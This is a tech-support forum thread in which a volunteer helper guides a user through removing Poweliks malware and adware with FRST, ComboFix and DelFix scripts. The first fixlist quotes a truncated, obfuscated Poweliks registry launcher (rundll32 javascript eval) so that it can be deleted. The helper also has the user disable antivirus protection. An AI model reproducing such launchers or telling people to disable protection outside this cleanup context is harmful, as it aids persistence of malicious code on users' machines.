Various "threats blocked" repeatedly

Hi, any help will be greatly appreciated. I have attached requested logs. Thank you!

This POWELIKS malware is becoming the new EBOLA… Sheesh.

Removalist Notified, sit tight.

Ugh. Thanks!

Hello,

First from Start > Control Panel > Programs and Features try to uninstall the following;
Catalina Savings Printer

Also, this isn’t good.

AV: AVG Internet Security 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}

By installing two antivirus you will not solve the problem. Remove and uninstall one AntiVirus and second keep active.

Before executing this script, disable AV’s real-time protection as in this case FRST shall behave very aggressively.

1. Open notepad and copy/paste the text present inside the code box below.
To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system

Start
File: C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\Display.dll
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\...\MountPoints2: {8d84674c-671a-11e3-9f8a-d48564c15743} - F:\InnoTabSetup.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKCU - {4B45E4A6-2735-4225-8327-343970DB1298} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=&apn_dtid=OSJ000&apn_uid=784D515E-63E2-4F5F-8662-083B89FFAA62&apn_sauid=8E0F95B2-0D62-4449-AD1E-694ECD1DF29B
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://mysearch.avg.com/search?cid={D972B2FC-347A-4B23-B05A-247B4EC447F6}&mid=ca8bc220ccf147d1b94105cc2225beb0-b01acea7eee42607fef221742ba3762e22f3acec&lang=en&ds=AVG&coid=avgtbavg&pr=fr&d=2013-09-09 18:27:22&v=17.1.3.3&pid=safeguard&sg=0&sap=dsp&q={searchTerms}&cmpid=0913a
SearchScopes: HKCU - {C9821D6E-320A-4FC1-88D5-94822793A930} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} ->  No File
Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} -  No File
Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.2.101
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.2.101 [2014-01-11]
AlternateDataStreams: C:\ProgramData\Temp:054203E4
Hosts:
CustomCLSID: HKU\S-1-5-21-298660292-2333512594-2309689238-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
EmptyTemp:
C:\Program Files (x86)\Common Files\AVG Secure Search
C:\ProgramData\AVG SafeGuard toolbar
End

2. Save notepad as fixlist.txt to your Desktop.
NOTE: => It’s important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

3. Run FRST/FRST64 and press the Fix button just once and wait.
If the tool needed a restart please make sure you let the system to restart normally and let the tool completes its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Please attach it to your reply.
Note: If the tool warned you about the outdated version please download and run the updated version.

Online and no blocked threats so far! Fingers crossed!

Yes, FRST has targeted the malware itself thus malware isn’t loaded anymore. Now we shall deploy another powerfull tool as I would like to see the situation from another angle.

  1. Please download ComboFix by sUBs (
    http://www.mcshield.net/personal/magna86/Images/IconComboFix.png
    ) from here and save it to your Desktop.
    [i]If you are unsure how ComboFix works, read this guide.

  1. Temporarily disable your AntiVirus program, usually via a right click on the System Tray icon. They may interfere with Combofix.
    If you are unsure how to do this please read this or this Instruction.

Instructions how to disable avast:
• Right click on the avast! system tray icon (
http://www.mcshield.net/pg/images/avast5.png
) in the lower right corner of the screen and scroll up to avast! shield controls;
• In the menu that appears, choose Disable Permanently. When you are prompted to turn off security, click Yes.

Note: Do not forget to turn back on this option after the cleaning by choosing avast! shield controls > Enable all shield options.


  1. Run ComboFix. Then, on disclaimer window, click I Agree! button.

[i][size=7pt]- ComboFix will check if there is a newer version of ComboFix available.
Click Yes if prompted to download.
-If Recovery Console is not installed, ComboFix will offer download & installation.
Click Yes to allow ComboFix to install Recovery Console.

  • ComboFix will scan your computer in stages, total of 50 stages.
    Do not mouse-click around while ComboFix is running.
  • If malware is detected, ComboFix will begin with its removal, and may need to restart Windows.
    Note:If you see a message like “Illegal operation attempted on a registry key that has been marked for deletion” just restart your computer.
    [/i]

  1. When the tool is finished, it will produce a log report for you. (typical location: C:\ComboFix.txt)
    => Attach log report (ComboFix.txt) back to topic.

ComboFix shall also create addition log (typical location: C:\Qoobox\ComboFix-quarantined-files.txt)
=> Please attach that report (ComboFix-quarantined-files.txt) as well.

Thanks so much for all your help. Please see attached logs:

Open notepad and copy/paste the text present inside the code box below:

Registry::
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"vProt"=-

Folder::
c:\program files (x86)\AVG SafeGuard toolbar
c:\program files (x86)\Common Files\AVG Secure Search

Driver::
vToolbarUpdater18.1.9

File::
c:\windows\Tasks\AVG-Secure-Search-Update_0214b_rel.job
c:\windows\Tasks\AVG-Secure-Search-Update_0214b_rmv.job

Save this as CFScript.txt

http://img.photobucket.com/albums/v666/sUBs/CFScriptB-4.gif

Close all browser windows and refering to the picture above.

Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will will re-run. When finished, it will produce a log for you.
Attach the contents of the log in your next reply. (typical location: C:[b]ComboFix.txt[/b] )

.

Run FRST tool again, check box for Addition.txt option and press the Scan button. Post me both fresh created FRST.txt and Addition.txt logs for re-analysis.

When I run the CFScript.txt it comes up with a message after the scan saying: “Unable to create backup of the current registry file C:\Windows\System32\config\SYSTEM! Continue restoration of this file?”
Please advise!

I went ahead and continued with restoration as I assumed that I could restore from a previous backup if necessary. Attached are the requested logs. Thanks again.

Yes, you did the right thing for continue with steps. Integrated ERUNT tool into ComboFix and FRST has refused to work, thus creates the error.

1. Open notepad and copy/paste the text present inside the code box below.
To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to the operating system

CloseProcesses:
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
Hosts:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-298660292-2333512594-2309689238-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
CHR Extension: (AVG SafeGuard) - C:\Users\Ray\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-10-05]
EmptyTemp:
C:\Users\Ray\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof

2. Save notepad as fixlist.txt to your Desktop.
NOTE: => It’s important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

3. Run FRST/FRST64 and press the Fix button just once and wait.
If the tool needed a restart please make sure you let the system to restart normally and let the tool completes its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Please attach it to your reply.
Note: If the tool warned you about the outdated version please download and run the updated version.

.

How is the computer behavior now?

The computer seems to be running normally, now. I have had the AV turned off while I’ve been working these steps, so I’m unsure if the pop ups have stopped. It is definitely running faster and more smoothly. Please see attached.

Turned Avast back on and no popups at all! I’m thrilled as they were coming at several per minute before. ;D

So …we fix the problem? :slight_smile: If so, I have intent to remove my tools.

It appears so. Thank you very much!

The following will implement some post-cleanup procedures:

=> Please download DelFix by Xplode to your Desktop.

Run the tool and check the following boxes below;
[i]
http://www.mcshield.net/personal/magna86/Images/checkmark.png
Remove disinfection tools

http://www.mcshield.net/personal/magna86/Images/checkmark.png
Create registry backup

http://www.mcshield.net/personal/magna86/Images/checkmark.png
Purge System Restore [/i]
Click Run button and wait a few seconds for the programme completes his work.
At this point all the tools we used here should be gone. Tool will create an report for you (C:[b]DelFix.txt[/b])

The tool will also record healthy state of registry and make a backup using ERUNT program in %windir%\ERUNT\DelFix
Tool deletes old system restore points and create a fresh system restore point after cleaning.

Done! You’re awesome! Very much appreciated.